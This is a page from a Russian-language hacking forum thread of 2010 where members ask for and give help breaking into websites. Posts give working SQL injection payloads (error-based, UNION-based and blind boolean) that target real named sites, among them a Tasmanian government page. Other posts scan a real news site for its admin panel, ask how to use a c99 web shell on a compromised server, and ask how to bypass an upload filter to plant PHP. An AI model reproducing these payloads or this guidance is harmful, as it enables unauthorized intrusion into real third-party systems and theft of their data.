Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    436
    Likes Received:
    46
    Reputations:
    40
    hxxp://site.com/gallery.php?file=1+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)

    лучше ссылку в студию если конечно сайт не в .ru зоне
     
  2. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    Хочеться взять и ... :(

    Если ошибка есть, то может быть и слепая (О чудо, я открыл глаза на мир скулей? ).
    Ты бы лучше выложил ссылку.
    Ты вообще адекватный человек?
    Если ошибка PHP, ошибки Sql синтаксиса нету, причём здесь твой вывод через ошибку?
    Аналогично.


    // Будь тут Grey, он бы вам таких клизм вставил, что вы бы больше сюда незаходили :)

    2pinch, ну раз непомешан, чего советовать тогда?
     
    #13282 Ctacok, 31 May 2010
    Last edited: 31 May 2010
    1 person likes this.
  3. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    75
    Likes Received:
    17
    Reputations:
    -1
    2 Ctacok подскажи в какую сторону рыть, с чего начать, где почитать. С меня могорыч)
     
  4. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    https://forum.antichat.ru/thread43966.html
     
    2 people like this.
  5. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,130
    Likes Received:
    604
    Reputations:
    690
    2DrakonSerg пробуй варианты с POST запросом или скинь линк на ресурс в ПМ
    если после поиска в урле есть типо такого то...
    приме:
    search.php?go=search&action=se&search=123456789')+union+select+1,2,table_name,4,5,14+from+information_schema.tables+--+
     
    _________________________
    1 person likes this.
  6. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Попробуй влиять на запрос, как при get-запросе.
    Например: при вводе в поле поиска
    Code:
    1
    - получаешь результат "А", при вводе
    Code:
    1+AND+1=1
    - получаешь результат "А", а при вводе
    Code:
    1+AND+1=2
    - получаешь резульата "В".
    Ошибка не является sql-инъекцией, а вот влияние на результат запроса - ДА.
     
  7. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Что-то мне подсказывает, что это joomla ;)
     
  8. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Потому что в joomle во многих случаях используется чистый md5 хешь.
    Я так понимаю доступа к базе нет, соответственно и хешь получить не можешь.
     
  9. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    не видел никояда пасс от бд бил мд5//
     
  10. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    659
    Likes Received:
    117
    Reputations:
    37
    Скажите, как быть, если вот такая ошибка:
    Можно ли провести инъекцию в таком случае? Вот линк:
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    попробуй):

    Code:
    http://www.bicentenary.tas.gov.au/page.php?id=-66+or+1=1+and+substring(version(),1,1)=3
    
     
    3 people like this.
  12. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    314
    Reputations:
    163
    2 CyberHunter

    http://www.bicentenary.tas.gov.au/print.php?id=127+and+substring(version(),1,1)=3
    3 ветка
     
    2 people like this.
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    первый раз встречал,и поэтому не был уверен..а так понял .спс ))
     
    _________________________
  14. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    659
    Likes Received:
    117
    Reputations:
    37
    Скажите как открыть архив в с99 шелле?
     
  15. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    944
    Likes Received:
    428
    Reputations:
    139
    Я так понимаю ты хочешь его распаковать, а не открыть.

    Зависит от того, какой архив и какая ОС.

    В линуксе так:

    tgz или tar.gz - tar -zxvf < file >
    tar.bz2 - tar -xvfj < file >
    zip - unzip < file >
    rar - unrar x < file >

    В виндовс:

    Ищи директорию с архиватором.
    Для ВинРар:

    > cd C:\Program Files\WinRAR\
    > unrar e < file >
     
    2 people like this.
  16. FlaktW

    FlaktW Member

    Joined:
    19 Aug 2009
    Messages:
    483
    Likes Received:
    33
    Reputations:
    12
    Не могу найти админку, сканером только это нашел.

    » http://www.onlinenews.com.pk/Team/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/css/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/img/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/news/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/plesk-stat/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/preview/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/site/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/weather/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/css/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/db/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/favicon.ico HTTP 200 OK
    » http://www.onlinenews.com.pk/images/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/img/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/index.php HTTP 200 OK
    » http://www.onlinenews.com.pk/news/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/picture_library/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/team/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/weather/ HTTP 403 Forbidden
     
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    Win32,
    Льёшь этот файл http://disk.re4ka.net/files/70985850/pclzip.lib.php на сервер.
    Потом в тойже папке создаёшь файл, unzip.php
    PHP:
    <?php  set_time_limit(0);      $file='file.zip';  require_once('pclzip.lib.php');  $zip = new PclZip($file);  $ext $zip->extract();  if($ext==0)      die("Ошибка! ".$zip->errorInfo(true));  foreach ($ext as $val) {      echo $val['filename']."<br />";  }  echo "<b>Файлы успешно извлечены!!</b>";  ?>
    $file как бы твой zip файл.
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    ребят в админке есть место для загрузки картинок,стоит фильтр,не могу загрузить php файл.. переименовал файл в php.jpg ,файл загрузилось,но не интерпретируется..

    есть еще методы обхода фильтрации?
     
    _________________________
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,043
    Likes Received:
    1,138
    Reputations:
    350
    У меня возле дома стоит автомат по приёму платежей. Он принимает купюры и монеты.

    Я попробывал засунуть туда рулон туалетной бумаги с написанной на ней цифрой 1000 - не сработало. В монетоприёмник засовывал жетоны на метро - не катит, а крышка от колодца туда не полезла :(

    Можно как-то обойти проверку?
     
    2 people like this.
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    Jokester вообще то так можно обойти фильтрацию (php.jpg) :)

    если хочешь могу отправить в личку
     
    _________________________
Loading...
Thread Status:
Not open for further replies.